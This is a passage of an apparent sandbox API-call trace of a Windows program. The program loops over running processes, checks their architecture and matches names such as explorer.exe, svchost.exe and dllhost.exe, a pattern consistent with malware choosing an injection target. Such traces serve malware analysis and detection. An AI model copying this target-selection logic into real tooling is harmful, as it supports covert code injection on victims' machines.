th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0201.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0201.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0201.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0201.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0201.886] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.886] CloseHandle (hObject=0xd8) returned 1 [0201.886] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0201.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0201.886] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.886] CloseHandle (hObject=0xd8) returned 1 [0201.886] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0201.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0201.887] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.887] CloseHandle (hObject=0xd8) returned 1 [0201.887] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0201.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0201.888] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.888] CloseHandle (hObject=0xd8) returned 1 [0201.888] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0201.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0201.888] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.888] CloseHandle (hObject=0xd8) returned 1 [0201.888] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0201.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0201.889] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.889] CloseHandle (hObject=0xd8) returned 1 [0201.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0201.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0201.889] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.889] CloseHandle (hObject=0xd8) returned 1 [0201.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0201.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0201.890] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.890] CloseHandle (hObject=0xd8) returned 1 [0201.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0201.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0201.891] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.891] CloseHandle (hObject=0xd8) returned 1 [0201.891] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0201.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0201.891] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.891] CloseHandle (hObject=0xd8) returned 1 [0201.891] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0201.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0201.892] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.892] CloseHandle (hObject=0xd8) returned 1 [0201.892] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0201.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0201.892] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.892] CloseHandle (hObject=0xd8) returned 1 [0201.892] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0201.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0201.893] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.893] CloseHandle (hObject=0xd8) returned 1 [0201.893] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0201.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0201.893] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.894] CloseHandle (hObject=0xd8) returned 1 [0201.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0201.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0201.894] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.894] CloseHandle (hObject=0xd8) returned 1 [0201.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0201.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0201.895] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.895] CloseHandle (hObject=0xd8) returned 1 [0201.895] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0201.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0201.895] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.895] CloseHandle (hObject=0xd8) returned 1 [0201.895] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0201.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0201.896] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.896] CloseHandle (hObject=0xd8) returned 1 [0201.896] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0201.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0201.896] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.896] CloseHandle (hObject=0xd8) returned 1 [0201.896] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0201.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0201.897] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.897] CloseHandle (hObject=0xd8) returned 1 [0201.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0201.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0201.898] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.898] CloseHandle (hObject=0xd8) returned 1 [0201.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0201.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0201.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0201.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0201.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0201.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0201.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0201.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0201.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0201.901] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.901] CloseHandle (hObject=0xd8) returned 1 [0201.901] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0201.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0201.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0201.902] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.902] CloseHandle (hObject=0xd8) returned 1 [0201.902] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0201.902] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0201.902] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0201.902] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0201.903] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0201.903] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.903] CloseHandle (hObject=0xd8) returned 1 [0201.903] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0201.967] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.967] CloseHandle (hObject=0xd8) returned 1 [0201.967] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0201.967] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0201.968] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.968] CloseHandle (hObject=0xd8) returned 1 [0201.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0201.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0201.969] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.969] CloseHandle (hObject=0xd8) returned 1 [0201.969] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0201.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0201.969] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0201.970] CloseHandle (hObject=0xd4) returned 1 [0201.970] Sleep (dwMilliseconds=0x3e8) [0203.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0203.061] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0203.061] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0203.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0203.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0203.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0203.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0203.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0203.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0203.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0203.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0203.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0203.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0203.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0203.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0203.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0203.066] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0203.067] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0203.067] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0203.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0203.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 